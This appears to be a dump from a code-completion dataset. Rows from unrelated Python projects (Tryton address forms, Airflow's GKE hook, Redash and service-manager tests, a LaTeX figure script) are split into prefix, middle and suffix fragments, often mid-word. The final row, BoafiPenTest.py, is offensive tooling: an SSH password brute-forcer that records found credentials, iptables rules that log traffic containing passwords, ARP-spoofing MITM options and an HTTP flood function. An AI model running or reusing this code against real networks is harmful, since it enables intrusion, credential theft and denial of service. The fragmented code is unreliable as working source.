repo_name
stringlengths 5
100
| path
stringlengths 4
231
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 6
947k
| score
float64 0
0.34
| prefix
stringlengths 0
8.16k
| middle
stringlengths 3
512
| suffix
stringlengths 0
8.17k
|
|---|---|---|---|---|---|---|---|---|
garimamalhotra/davitpy
|
pydarn/proc/music/__init__.py
|
Python
|
gpl-3.0
| 678
| 0.00885
|
# Waver module __init__.
|
py
"""
*******************************
WAVER
*******************************
This subpackage contains various utilities for WAVER,
the SuperDARN Wave Analysis Software Package.
DEV: functions/modules/classes with a * have not been developed yet
*******************************
"""
#import sigio
from music import *
#from signal import *
#from sigproc import *
#from compare import *
#from xcor impor
|
t *
#
#
# *************************************************************
# Define a few general-use constants
# Mean Earth radius [km]
Re = 6371.0
# Polar Earth radius [km]
RePol = 6378.1370
# Equatorial Earth radius [km]
ReEqu = 6,356.7523
|
PritishC/nereid
|
trytond_nereid/party.py
|
Python
|
gpl-3.0
| 12,239
| 0.000163
|
# This file is part of Tryton. The COPYRIGHT file at the top level of
# this repository contains the full copyright notices and license terms.
import warnings
from flask_wtf import Form
from wtforms import TextField, IntegerField, SelectField, validators
from werkzeug import redirect, abort
from jinja2 import TemplateNotFound
from nereid import request, url_for, render_template, login_required, flash, \
jsonify, route, current_user
from trytond.model import ModelView, ModelSQL, fields
from trytond.pool import Pool, PoolMeta
from trytond.transaction import Transaction
from trytond import backend
from sql import As, Literal, Column
from .user import RegistrationForm
from .i18n import _
__all__ = ['Address', 'Party', 'ContactMechanism']
class AddressForm(Form):
"""
A form resembling the party.address
"""
name = TextField(_('Name'), [validators.Required(), ])
street = TextField(_('Street'), [validators.Required(), ])
streetbis = TextField(_('Street (Bis)'))
zip = TextField(_('Post Code'), [validators.Required(), ])
city = TextField(_('City'), [validators.Required(), ])
country = SelectField(_('Country'), [validators.Required(), ], coerce=int)
subdivision = IntegerField(_('State/County'), [validators.Required()])
email = TextField(_('Email'))
phone = TextField(_('Phone'))
def __init__(self, formdata=None, obj=None, prefix='', **kwargs):
super(AddressForm, self).__init__(formdata, obj, prefix, **kwargs)
# Fill country choices while form is initialized
self.country.choices = [
(c.id, c.name) for c in request.nereid_website.countries
]
class Address:
"""Party Address"""
__name__ = 'party.address'
__metaclass__ = PoolMeta
registration_f
|
orm = RegistrationForm
@classmethod
def __register__(cls, module_name):
pool = Pool()
Party = pool.get('party.party')
Con
|
tactMechanism = pool.get('party.contact_mechanism')
TableHandler = backend.get('TableHandler')
cursor = Transaction().cursor
table = TableHandler(cursor, cls, module_name)
party = Party.__table__()
address = cls.__table__()
mechanism = ContactMechanism.__table__()
super(Address, cls).__register__(module_name)
# Migration from 2.8: move phone and email to contact mechanisms
for column in ['email', 'phone']:
if table.column_exist(column):
join = address.join(
party, condition=(party.id == address.party)
)
select = join.select(
address.create_date, address.create_uid,
address.write_date, address.write_uid,
As(Literal(column), 'type'),
As(Column(address, column), 'value'), address.party,
As(Literal(True), 'active'),
where=(Column(address, column) != '')
)
insert = mechanism.insert(
columns=[
mechanism.create_date,
mechanism.create_uid, mechanism.write_date,
mechanism.write_uid, mechanism.type,
mechanism.value, mechanism.party, mechanism.active,
], values=select)
cursor.execute(*insert)
table.column_rename(column, '%s_deprecated' % column)
@classmethod
def get_address_form(cls, address=None):
"""
Return an initialised Address form that can be validated and used to
create/update addresses
:param address: If an active record is provided it is used to autofill
the form.
"""
if address:
form = AddressForm(
request.form,
name=address.name,
street=address.street,
streetbis=address.streetbis,
zip=address.zip,
city=address.city,
country=address.country and address.country.id,
subdivision=address.subdivision and address.subdivision.id,
email=address.party.email,
phone=address.party.phone
)
else:
address_name = "" if request.nereid_user.is_anonymous() else \
request.nereid_user.display_name
form = AddressForm(request.form, name=address_name)
return form
@classmethod
@route("/create-address", methods=["GET", "POST"])
@login_required
def create_address(cls):
"""
Create an address for the current nereid_user
GET
~~~
Return an address creation form
POST
~~~~
Creates an address and redirects to the address view. If a next_url
is provided, redirects there.
.. version_added: 3.0.3.0
"""
form = cls.get_address_form()
if request.method == 'POST' and form.validate():
party = request.nereid_user.party
address, = cls.create([{
'name': form.name.data,
'street': form.street.data,
'streetbis': form.streetbis.data,
'zip': form.zip.data,
'city': form.city.data,
'country': form.country.data,
'subdivision': form.subdivision.data,
'party': party.id,
}])
if form.email.data:
party.add_contact_mechanism_if_not_exists(
'email', form.email.data
)
if form.phone.data:
party.add_contact_mechanism_if_not_exists(
'phone', form.phone.data
)
return redirect(url_for('party.address.view_address'))
try:
return render_template('address-add.jinja', form=form)
except TemplateNotFound:
# The address-add template was introduced in 3.0.3.0
# so just raise a deprecation warning till 3.2.X and then
# expect the use of address-add template
warnings.warn(
"address-add.jinja template not found. "
"Will be required in future versions",
DeprecationWarning
)
return render_template('address-edit.jinja', form=form)
@classmethod
@route("/save-new-address", methods=["GET", "POST"])
@route("/edit-address/<int:address>", methods=["GET", "POST"])
@login_required
def edit_address(cls, address=None):
"""
Edit an Address
POST will update an existing address.
GET will return a existing address edit form.
.. version_changed:: 3.0.3.0
For creating new address use the create_address handled instead of
this one. The functionality would be deprecated in 3.2.X
:param address: ID of the address
"""
if address is None:
warnings.warn(
"Address creation will be deprecated from edit_address handler."
" Use party.address.create_address instead",
DeprecationWarning
)
return cls.create_address()
form = cls.get_address_form()
if address not in (a.id for a in request.nereid_user.party.addresses):
# Check if the address is in the list of addresses of the
# current user's party
abort(403)
address = cls(address)
if request.method == 'POST' and form.validate():
party = request.nereid_user.party
cls.write([address], {
'name': form.name.data,
'street': form.street.data,
'streetbis': form.streetbis.data,
'zip': form.zip.data,
'city': form.city.data,
'country': form.country.data,
'subdivision': form.subdivision.data,
})
if form.email.data:
party.add_contact_mechanism_if_not_exists(
'email', form.email.
|
CenterForOpenScience/waterbutler
|
tests/providers/osfstorage/test_exceptions.py
|
Python
|
apache-2.0
| 803
| 0.007472
|
import pytest
from waterbutler.providers.osfstorage.exceptions import OsfStorageQuotaExceededError
class TestExceptionSerialization:
@pytest.mark.parametrize(
'exception_class',
[(OsfStorageQuotaExceededError),]
)
def test_tolerate_dumb_signature(self, exception_class):
"""In order for WaterButlerError-inheriting exceptions to survive pickling/unpickling, it is
necessary for them to be able to be instantiated with a single integer arg. The reasons for
this are described in the docstring for `waterbutler.core.exceptions.WaterButlerError`.
"""
try:
i_live_but_why = exception_class(616)
except Exceptio
|
n as exc:
pytest.fail(str(exc))
assert isinstance(i_live_bu
|
t_why, exception_class)
|
bolkedebruin/airflow
|
airflow/providers/google/cloud/hooks/kubernetes_engine.py
|
Python
|
apache-2.0
| 10,778
| 0.002227
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
"""
This module contains a Google Kubernetes Engine Hook.
.. spelling::
gapic
enums
"""
import time
import warnings
from typing import Dict, Optional, Sequence, Union
from google.api_core.exceptions import AlreadyExists, NotFound
from google.api_core.gapic_v1.method import DEFAULT
from google.api_core.retry import Retry
# not sure why but mypy complains on missing `container_v1` but it is clearly there and is importable
from google.cloud import container_v1, exceptions # type: ignore[attr-defined]
from google.cloud.container_v1.gapic.enums import Operation
from google.cloud.container_v1.types import Cluster
from google.protobuf.json_format import ParseDict
from airflow import version
from airflow.exceptions import AirflowException
from airflow.providers.google.common.consts import CLIENT_INFO
from airflow.providers.google.common.hooks.base_google import PROVIDE_PROJECT_ID, GoogleBaseHook
OPERATIONAL_POLL_INTERVAL = 15
class GKEHook(GoogleBaseHook):
"""
Hook for Google Kubernetes Engine APIs.
All the methods in the hook where project_id is used must be called with
keyword arguments rather than positional.
"""
def __init__(
self,
gcp_conn_id: str = "google_cloud_default",
delegate_to: Optional[str] = None,
location: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
) -> None:
super().__init__(
gcp_conn_id=gcp_conn_id,
delegate_to=delegate_to,
impersonation_chain=impersonation_chain,
)
self._client = None
self.location = location
def get_conn(self) -> container_v1.ClusterManagerClient:
"""
Returns ClusterManagerCLinet object.
:rtype: google.cloud.container_v1.ClusterManagerClient
"""
if self._client is None:
credentials = self._get_credentials()
self._client = container_v1.ClusterManagerClient(credentials=credentials, client_info=CLIENT_INFO)
return self._client
# To preserve backward compatibility
# TODO: remove one day
def get_client(self) -> container_v1.ClusterManagerClient:
warnings.warn(
"The get_client method has been deprecated. You should use the get_conn method.",
DeprecationWarning,
)
return self.get_conn()
def wait_for_operation(self, operation: Operation, project_id: Optional[str] = None) -> Operation:
"""
Given an operation, continuously fetches the status from Google Cloud until either
completion or an error occurring
:param operation: The Operation to wait for
:param project_id: Google Cloud project ID
:return: A new, updated operation fetched from Google Cloud
"""
self.log.info("Waiting for OPERATION_NAME %s", operation.name)
time.sleep(OPERATIONAL_POLL_INTERVAL)
while operation.status != Operation.Status.DONE:
if operation.status == Operation.Status.RUNNING or operation.status == Operation.Status.PENDING:
time.sleep(OPERATIONAL_POLL_INTERVAL)
else:
raise exceptions.GoogleCloudError(f"Operation has failed with status: {operation.status}")
# To update status of operation
operation = self.get_operation(operation.name, project_id=project_id or self.project_id)
return operation
def get_operation(self, operation_name: str, project_id: Optional[str] = None) -> Operation:
"""
Fetches the operation from Google Cloud
:param operation_name: Name of operation to fetch
:param project_id: Google Cloud project ID
:return: The new, updated operation from Google Cloud
"""
return self.get_conn().get_operation(
name=f'projects/{project_id or self.project_id}'
+ f'/locations/{self.location}/operations/{operation_name}'
)
@staticmethod
def _append_label(cluster_proto: Cluster, key: str, val: str) -> Cluster:
"""
Append labels to provided Cluster Protobuf
Labels must fit the regex ``[a-z]([-a-z0-9]*[a-z0-9])?`` (current
airflow version string follows semantic versioning spec: x.y.z).
:param cluster_proto: The proto to append resource_label airflow
version to
:param
|
key: The key label
:param val:
:return: The cluster proto updated with new label
"""
val = val.replace('.', '-').replace('+', '-')
cluster_proto.resource_labels.update({key: val})
return cluster_proto
@GoogleBaseHook.fallbac
|
k_to_default_project_id
def delete_cluster(
self,
name: str,
project_id: str = PROVIDE_PROJECT_ID,
retry: Retry = DEFAULT,
timeout: float = DEFAULT,
) -> Optional[str]:
"""
Deletes the cluster, including the Kubernetes endpoint and all
worker nodes. Firewalls and routes that were configured during
cluster creation are also deleted. Other Google Compute Engine
resources that might be in use by the cluster (e.g. load balancer
resources) will not be deleted if they were not present at the
initial create time.
:param name: The name of the cluster to delete
:param project_id: Google Cloud project ID
:param retry: Retry object used to determine when/if to retry requests.
If None is specified, requests will not be retried.
:param timeout: The amount of time, in seconds, to wait for the request to
complete. Note that if retry is specified, the timeout applies to each
individual attempt.
:return: The full url to the delete operation if successful, else None
"""
self.log.info("Deleting (project_id=%s, location=%s, cluster_id=%s)", project_id, self.location, name)
try:
resource = self.get_conn().delete_cluster(
name=f'projects/{project_id}/locations/{self.location}/clusters/{name}',
retry=retry,
timeout=timeout,
)
resource = self.wait_for_operation(resource)
# Returns server-defined url for the resource
return resource.self_link
except NotFound as error:
self.log.info('Assuming Success: %s', error.message)
return None
@GoogleBaseHook.fallback_to_default_project_id
def create_cluster(
self,
cluster: Union[Dict, Cluster],
project_id: str = PROVIDE_PROJECT_ID,
retry: Retry = DEFAULT,
timeout: float = DEFAULT,
) -> str:
"""
Creates a cluster, consisting of the specified number and type of Google Compute
Engine instances.
:param cluster: A Cluster protobuf or dict. If dict is provided, it must
be of the same form as the protobuf message
:class:`google.cloud.container_v1.types.Cluster`
:param project_id: Google Cloud project ID
:param retry: A retry object (``google.api_core.retry.Retry``) used to
retry requests.
If None is specified, requests will not be retried.
:param timeout: The amount of time, in seconds, to wait for the request to
complete. Note that if retry is specifie
|
habibutsu/rc-car
|
rc_car/vechicle.py
|
Python
|
mit
| 3,174
| 0
|
import asyncio
import logging
import os
import signal
from collections import defaultdict
import aiohttp.web
from aiohttp_index import IndexMiddleware
logger = logging.getLogger('rc-car.vechicle')
class Vechicle:
DEFAULT_CFG = {}
de
|
f __init__(self, cfg=None, loop=None):
self.loop = loop or asyncio.get_event_loop()
self.cfg = cfg
if self.cfg.model.use_mock:
logger.info('Use mock-factory...')
|
os.environ['GPIOZERO_PIN_FACTORY'] = 'mock'
from gpiozero.pins.mock import MockPWMPin
from gpiozero import Device
Device.pin_factory.pin_class = MockPWMPin
self.commands = defaultdict(list)
self.sensors = defaultdict(list)
self.parameters = defaultdict(list)
self.components = {}
self.init_signals()
self.init_aiohttp_app()
def init_signals(self):
for sig in ('SIGINT', 'SIGTERM'):
self.loop.add_signal_handler(getattr(signal, sig), self.stop)
self.loop.add_signal_handler(signal.SIGHUP, self.reload)
signal.siginterrupt(signal.SIGTERM, False)
def init_aiohttp_app(self):
self.aiohttp_app = aiohttp.web.Application(
loop=self.loop,
middlewares=[
IndexMiddleware()
]
)
self.aiohttp_app['server'] = self
def stop(self):
logger.info('Stopping server...')
async def stop():
app = self.aiohttp_app
if 'http' in app:
srv = app['http']['srv']
handler = app['http']['handler']
srv.close()
await srv.wait_closed()
await handler.shutdown(self.cfg.server.shutdown_timeout)
await app.shutdown()
await app.cleanup()
self.loop.stop()
return self.loop.create_task(stop())
def reload(self):
logger.info('Handle SIGHUP')
def add_component(self, name, component):
component.register(self)
self.components[name] = component
def get_state(self):
sensors = {
name: value()
for name, value in self.sensors.items()
}
parameters = {
name: value()
for name, value in self.parameters.items()
}
return {
'sensors': sensors,
'parameters': parameters
}
def run_forever(self):
async def init():
handler = self.aiohttp_app.make_handler()
srv = await self.loop.create_server(
handler,
host=self.cfg.server.host,
port=self.cfg.server.port,
backlog=self.cfg.server.backlog
)
self.aiohttp_app['http'] = {
'handler': handler,
'srv': srv
}
self.loop.run_until_complete(init())
logger.info(
'Service started on %s:%s with pid %s',
self.cfg.server.host, self.cfg.server.port, os.getpid())
try:
self.loop.run_forever()
finally:
logger.info('Server was stopped')
|
LouisPlisso/analysis_tools
|
latex_directory_1_2.py
|
Python
|
gpl-3.0
| 5,070
| 0.002959
|
#!/usr/bin/env python
"Module to aggregate all pdf figures of a directory \
into a single latex file, and compile it."
from __future__ import division, print_function
import os
import sys
import re
from optparse import OptionParser
_VERSION = '1.0'
def latex_dir(outfile_name, directory, column=2, eps=False):
"Print latex source file"
print(directory)
with open(outfile_name, 'w') as outfile:
outfile.write(r"""\documentclass[10pt]{article}
\usepackage[T1]{fontenc}
\usepackage[utf8x]{inputenc}
\usepackage{fancyhdr}
\def\goodgap{\hspace{\subfigtopskip}\hspace{\subfigbottomskip}}
\usepackage%(include_pdf_package_option)s{graphicx}
\usepackage{subfigure,a4wide}
%%set dimensions of columns, gap between columns, and paragraph indent
\setlength{\textheight}{8in}
%%\setlength{\textheight}{9.3in}
\setlength{\voffset}{0.5in}
\setlength{\topmargin}{-0.55in}
%%\setlength{\topmargin}{0in}
\setlength{\headheight}{12.0pt}
%%\setlength{\headsep}{0.0in}
%%\setlength{\textwidth}{7.43in}
\setlength{\textwidth}{7.10in}
%%\setlength{\textwidth}{6in}
\setlength{\hoffset}{-0.4in}
\setlength{\columnsep}{0.25in}
\setlength{\oddsidemargin}{0.0in}
\setlength{\evensidemargin}{0.0in}
%% more than .95 of text and figures
\def\topfraction{.95}
\def\floatpagefraction{.95}
\def\textfraction{.05}
\newcommand{\mydefaultheadersandfooters}
{
\chead{\today}
\rhead{\thepage}
\lfoot{}
\cfoot{}
\rfoot{}
}
\title{Automatically generated latex for directory %(title)s}
\author{%(login)s}
\begin{document}
\pagestyle{fancy}
\mydefaultheadersandfooters
\maketitle
\clearpage
""" % {'title': directory.replace('_', '\_'),
'login': os.getenv('L
|
OGNAME').capitalize(),
'include_pdf_package_option': '' if eps else '[pdftex]'})
files = os.listdir(os.getcwd() + '/' + directory)
# exclude_filename = outfile.name.split('/'
|
)[-1].replace('.tex', '.pdf')
exclude_filename = 'latex_dir_'
pattern = re.compile(r'(?!%s)\S+\.%s' % (exclude_filename,
('eps' if eps else 'pdf')))
count = 0
if column == 1:
line_size = .99
elif column == 2:
line_size = .49
else:
print("invalid column size")
raise
nb_floats = 0
for cur_file in sorted(files):
if pattern.match(cur_file):
nb_floats += 1
if column == 1 or count % 2 == 0:
outfile.write(r"\begin{figure}[!ht]"
r"\begin{center}")
outfile.write(r"\subfigure[]{\includegraphics" +
r"[width=%f\textwidth,height=%f\textheight]{%s/%s}}"
% (line_size, .7*line_size, directory, cur_file))
if column == 1 or count % 2 != 0:
outfile.write('\n' + r"\caption{}\end{center}\end{figure}"
+ '\n')
if nb_floats >= 4:
outfile.write(r"\clearpage")
nb_floats = 0
elif count % 2 == 0:
# outfile.write('\goodgap')
pass
else:
print("Double column and modulo is not working on count: %d"
% count)
raise
count += 1
if count % 2 == 1:
outfile.write('\n' + r"\caption{}\end{center}\end{figure}" + '\n')
outfile.write(r"\end{document}")
def main():
"Option parsing and launch latex_dir"
usage = "%prog [-c nb_of_columns -w outtexfile] directory_list"
parser = OptionParser(usage = usage)
parser.add_option('-w', dest='outtexfile', type='string',
help='output latex file (default is dir/latex_dir.tex)')
parser.add_option('-c', dest='column', type='int', default = 2,
help='number of columns of latex file: 1 or 2')
parser.add_option('--eps', dest='eps', default=False, action='store_true',
help='use eps files instead of pdf')
(options, args) = parser.parse_args()
if not args:
parser.print_help()
exit(5)
for directory in args:
if not options.outtexfile:
outfile_name = os.sep.join((directory,
'latex_dir_%s.tex' % directory))
else:
outfile_name = options.outtexfile
if options.column not in (1, 2):
print("invalid number of columns")
parser.print_help()
exit(5)
latex_dir(outfile_name, directory, options.column, eps=options.eps)
#compile the tex file
if options.eps:
os.execlp('latex', 'latex', '-interaction=nonstopmode',
'-output-directory', directory, outfile_name)
else:
os.execlp('pdflatex', 'pdflatex', '-interaction=nonstopmode',
'-output-directory', directory, outfile_name)
if __name__ == '__main__':
sys.exit(main())
|
pubnative/redash
|
tests/handlers/test_authentication.py
|
Python
|
bsd-2-clause
| 2,213
| 0.003163
|
from tests import BaseTestCase
import mock
import time
from redash.models import User
from redash.authentication.account
|
import invite_token
from tests.handlers import get_request, post_request
class TestInvite(BaseTestCase):
def test_expired_invite_token(self):
with mock.patch('time.time') as patched_time:
patched_time.return_value = time.time() - (7 * 24 * 3600) - 10
token = invite_token(self.factory.user)
response = get_request('/invite/{}'.format(token), org=self.factory.org)
s
|
elf.assertEqual(response.status_code, 400)
def test_invalid_invite_token(self):
response = get_request('/invite/badtoken', org=self.factory.org)
self.assertEqual(response.status_code, 400)
def test_valid_token(self):
token = invite_token(self.factory.user)
response = get_request('/invite/{}'.format(token), org=self.factory.org)
self.assertEqual(response.status_code, 200)
def test_already_active_user(self):
pass
class TestInvitePost(BaseTestCase):
def test_empty_password(self):
token = invite_token(self.factory.user)
response = post_request('/invite/{}'.format(token), data={'password': ''}, org=self.factory.org)
self.assertEqual(response.status_code, 400)
def test_invalid_password(self):
token = invite_token(self.factory.user)
response = post_request('/invite/{}'.format(token), data={'password': '1234'}, org=self.factory.org)
self.assertEqual(response.status_code, 400)
def test_bad_token(self):
response = post_request('/invite/{}'.format('jdsnfkjdsnfkj'), data={'password': '1234'}, org=self.factory.org)
self.assertEqual(response.status_code, 400)
def test_already_active_user(self):
pass
def test_valid_password(self):
token = invite_token(self.factory.user)
password = 'test1234'
response = post_request('/invite/{}'.format(token), data={'password': password}, org=self.factory.org)
self.assertEqual(response.status_code, 302)
self.factory.user = User.get_by_id(self.factory.user.id)
self.assertTrue(self.factory.user.verify_password(password))
|
hmrc/service-manager
|
test/it/test_actions.py
|
Python
|
apache-2.0
| 11,909
| 0.002015
|
from servicemanager.actions import actions
from servicemanager.smcontext import SmApplication, SmContext, ServiceManagerException
from servicemanager.smprocess import SmProcess
from servicemanager.service.smplayservice import SmPlayService
from servicemanager.serviceresolver import ServiceResolver
import pytest
from .testbase import TestBase
class TestActions(TestBase):
def test_start_and_stop_one(self):
context = SmContext(SmApplication(self.config_dir_override), None, False, False)
result = actions.start_one(context, "TEST_ONE", False, True, False, None, port=None)
self.assertTrue(result)
self.waitForCondition((lambda: len(context.get_service("TEST_ONE").status())), 1)
context.kill("TEST_ONE", True)
self.assertEqual(context.get_service("TEST_ONE").status(), [])
def test_start_and_stop_one_with_append_args(self):
context = SmContext(SmApplication(self.config_dir_override), None, False, False)
actions.start_one(context, "TEST_FOUR", False, True, False, None, None, ["2"])
self.waitForCondition((lambda: len(context.get_service("TEST_FOUR").status())), 1)
context.kill("TEST_FOUR", True)
self.assertEqual(context.get_service("TEST_FOUR").status(), [])
@pytest.mark.online
def test_dropwizard_from_source(self):
sm_application = SmApplication(self.config_dir_override)
context = SmContext(sm_application, None, False, False)
service_resolver = ServiceResolver(sm_application)
servicetostart = "DROPWIZARD_NEXUS_END_TO_END_TEST"
actions.start_and_wait(
service_resolver,
context,
[servicetostart],
False,
False,
False,
None,
port=None,
seconds_to_wait=90,
append_args=None,
)
self.assertIsNotNone(context.get_service(servicetostart).status())
context.kill(servicetostart, True)
self.assertEqual(context.get_service(servicetostart).status(), [])
def test_dropwizard_from_jar(self):
sm_application = SmApplication(self.config_dir_override)
context = SmContext(sm_application, None, False, False)
service_resolver = ServiceResolver(sm_application)
self.startFakeNexus()
servicetostart = "DROPWIZARD_NEXUS_END_TO_END_TEST"
actions.start_and_wait(
service_resolver,
context,
[servicetostart],
False,
True,
False,
None,
port=None,
seconds_to_wait=90,
append_args=None,
)
self.assertIsNotNone(context.get_service(servicetostart).status())
context.kill(servicetostart, True)
self.assertEqual(context.get_service(servicetostart).status(), [])
@pytest.mark.online
def test_play_from_source(self):
sm_application = SmApplication(self.config_dir_override)
context = SmContext(sm_application, None, False, False)
service_resolver = ServiceResolver(sm_application)
servicetostart = "PLAY_NEXUS_END_TO_END_TEST"
port = None
secondsToWait = 90
append_args = None
actions.start_and_wait(
service_resolver, context, [servicetostart], True, False, False, None, port, secondsToWait, append_args,
)
self.assertIsNotNone(context.get_service(servicetostart).status())
context.kill(servicetostart, True)
self.assertEqual(context.get_service(servicetostart).status(), [])
def test_play_from_default_run_from_source(self):
sm_application = SmApplication(self.config_dir_override)
context = SmContext(sm_application, None, False, False)
service_resolver = ServiceResolver(sm_application)
servicetostart = "PLAY_NEXUS_END_TO_END_DEFAULT_SOURCE_TEST"
port = None
secondsToWait = 90
append_args = None
actions.start_and_wait(
service_resolver, context, [servicetostart], False, False, False, None, port, secondsToWait, append_args,
)
self.assertIsNotNone(context.get_service(servicetostart).status())
context.kill(servicetostart, True)
self.assertEqual(context.get_service(servicetostart).status(), [])
def test_play_from_source_default(self):
sm_application = SmApplication(self.config_dir_override)
context = SmContext(sm_application, None, False, False)
service_resolver = ServiceResolver(sm_application)
servicetostart = "PLAY_NEXUS_END_TO_END_TEST"
port = None
secondsToWait = 90
append_args = None
actions.start_and_wait(
service_resolver, context, [servicetostart], False, False, False, None, port, secondsToWait, append_args,
)
self.assertIsNotNone(context.get_service(servicetostart).status())
context.kill(servicetostart, True)
self.assertEqual(context.get_service(servicetostart).status(), [])
def test_successful_play_from_jar_without_waiting(self):
sm_application = SmApplication(self.config_dir_override)
context = SmContext(sm_application, None, False, False)
service_resolver = ServiceResolver(sm_application)
context.kill_everything(True)
self.startFakeNexus()
fatJar = True
release = False
proxy = None
port = None
seconds_to_wait = None
append_args = None
try:
servicetostart = ["PLAY_NEXUS_END_TO_END_TEST"]
actions.start_and_wait(
service_resolver,
context,
servicetostart,
False,
fatJar,
release,
proxy,
port,
seconds_to_wait,
append_args,
)
finally:
context.kill_everything(True)
def test_successful_play_default_run_from_jar_without_waiting(self):
sm_application = SmApplication(self.config_dir_override)
context = SmContext(sm_application, None, False, False)
service_resolver = ServiceResolver(sm_application)
context.kill_everything(True)
self.startFakeNexus()
source = False
fatJar = True
release = False
proxy = None
port = None
seconds_to_wait = None
append_args = None
try:
servicetostart = ["PLAY_NEXUS_END_TO_END_DEFAULT_JAR_TEST"]
actions.start_and_wait(
service_resolver,
context,
servicetostart,
source,
fatJar,
release,
proxy,
port,
seconds_to_wait,
append_args,
)
finally:
context.kill_everything(True)
def test_successful_play_from_jar_without_waiting_with_append_args(self):
sm_application = SmApplication(self.config_dir_override)
context = SmContext(sm_applicat
|
ion, None, False, False)
service_resolver = ServiceResolver(sm_application)
context.kill_everything(True)
self.startFakeNexus()
servicetostart = ["PLAY_NEXUS_END_TO_END_TEST"]
appendArgs = {"PLAY_NEXUS_END_TO_END_TEST": ["-DFoo=Bar"]}
fatJar = True
r
|
elease = False
proxy = None
port = None
seconds_to_wait = None
actions.start_and_wait(
service_resolver, context, servicetostart, False, fatJar, release, proxy, port, seconds_to_wait, appendArgs,
)
service = SmPlayService(context, "PLAY_NEXUS_END_TO_END_TEST")
self.waitForCondition(lambda: len(SmProcess.processes_matching(service.pattern)), 1)
processes = SmProcess.processes_matching(service.pattern)
self.assertTrue("-DFoo=Bar" in processes[0].args)
def test_failing_play_from_jar(self):
sm_application = SmApplication(self.config_dir_override)
context = SmContext(sm_application, None, False, False)
service_resolver = ServiceResolver(sm_a
|
fnzv/Boafi
|
BoafiPenTest.py
|
Python
|
mit
| 12,450
| 0.020484
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
########## boafi Pentest script
########## - Perform various pentests automatically and save reports for further study
########## - Features/TODOs: Ipv6,DHCP,DNS,NTP,exploits,mitm..
########## - Router bruteforce for easy guessable passwords
########## - Scan networks hosts and identify vulnerabilities
########## ...
### Author: Yessou Sami
### Project Boafi
## Dependencies: dsniff(arpspoof),paramiko(ssh bruteforce),iptables,scapy
import os,time,argparse,random,paramiko,socket,logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
from datetime import datetime
## Functions
def brute_pass(usr,passwd,ip,port):
print "Trying for "+usr+" - "+passwd
ssh=paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(ip,port,usr,passwd)
print "Password is: ",passwd
open("foundpass","a").write("IP: "+ip+" PORT: "+port+" USER: "+usr+" PASS: "+passwd)
except paramiko.AuthenticationException:
print("Bad Password - "+passwd)
ssh.close()
except socket.error:
print("Failed connection")
ssh.close()
def EnaLogging():
os.popen("iptables -I FORWARD -p all -j LOG --log-prefix 'GENERAL-LOG-'")
#Start Logging eve,ry connection to /var/log/messages
#Log also images on /tmp?
os.popen("iptables -I FORWARD -p all -m string --string 'jpg' --algo kmp -j LOG --log-prefix 'JPG-LOG-'")
os.popen("iptables -I FORWARD -p all -m string --string 'gif' --algo kmp -j LOG --log-prefix 'GIF-LOG-'")
os.popen("iptables -I FORWARD -p all -m string --string 'png' --algo kmp -j LOG --log-prefix 'PNG-LOG-'")
os.popen("iptables -I FORWARD -p all -m string --string 'mp4' --algo kmp -j LOG --log-prefix 'mp4-LOG-'")
#Log urls/web request
os.popen("iptables -I FORWARD -p tcp -m multiport --dports 80,443 -j LOG --log-prefix 'WWW-LOG-' ")
#Log DNS
os.popen("iptables -I FORWARD -p udp --dport 53 -j LOG --log-prefix 'DNS-LOG-'")
#Log credentials HTTP
os.popen("iptables -I FORWARD -p all -m string --string 'pass' --algo kmp -j LOG --log-prefix 'PASSWORD-LOG-'")
os.popen("iptables -I FORWARD -p all -m string --string 'user' --algo kmp -j LOG --log-prefix 'USERNAME-LOG-'")
###
parser = argparse.ArgumentParser()
parser.add_argument('-timeout', action='store', dest='timeout', default="none",
help='Define given seconds before the attack timeouts (mitm,scan,stress) if not specified will run until is killed')
parser.add_argument('-RA', action='store', dest='ipv6ra', default=False,
help='Flood ipv6 router advertisements for given minutes')
parser.add_argument('-file', action='store', dest='output', default=False,
help='File output for scans')
parser.add_argument('-scan', action='store', dest='scan', default=False,
help='Scan the given network address or host')
##ArpScan still in betatest.. need to fix scapy responses
parser.add_argument('--arpScan', action='store_true', dest='arpscan', default=False,
help='Arpscan to scan fast on LAN')
parser.add_argument('--syn', action='store_true', dest='syn', default=False,
help='SYN Scan enabled')
parser.add_argument('--service', action='store_true', dest='service', default=False,
help='Service Version detection enabled')
parser.add_argument('-brute', action='store', dest='brute', default="none",
help='Bruteforce SSH of given ip... example : -brute file-192.168.1.254:22')
parser.add_argument('-mitm', action='store', dest='mitm', default="none",
help='Perform MITM Attack on target')
parser.add_a
|
rgument('-mitmAll', action='store', dest='mitmall', default="none",
help='Perform MITM Attack on all hosts')
parser.add_argument('-stop-mitm', action='store_true', dest='stopmitm', default=
|
False,
help='Stop any Running MITM Attack')
parser.add_argument('-denyTcp', action='store', dest='denytcp', default="none",
help='Deny tcp connections of given host')
parser.add_argument('--dg', action='store', dest='dg', default="none",
help='Perform MITM Attack with given Default Gateway')
parser.add_argument('-craft', action='store', dest='packetcraft', default=False,
help='Enable Packet Crafting.. Example: -craft IP-TCP-DST192.168.1.1-SRC192.168.1.10-DPORT80')
parser.add_argument('-stress', action='store', dest='stress', default="none",
help='Perform Stress Testing on LAN.. Modes: DHCPv4-50,DHCPv6')
results = parser.parse_args()
### Functions
def httpflood(target):
ip=target
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, 80))
s.send("""GET /?="""+str(random.randrange(9999999))+""" HTTP/1.1\r\n
Connection: Keep-Alive """)
print """GET /"""+str(random.randrange(9999999))+""" HTTP/1.1\r\n
Connection: Keep-Alive """
except ValueError:
print "Host seems down or some connection error trying again..."
##################
if not(results.output):
output=str(time.time())
else:
output=results.output
syn=""
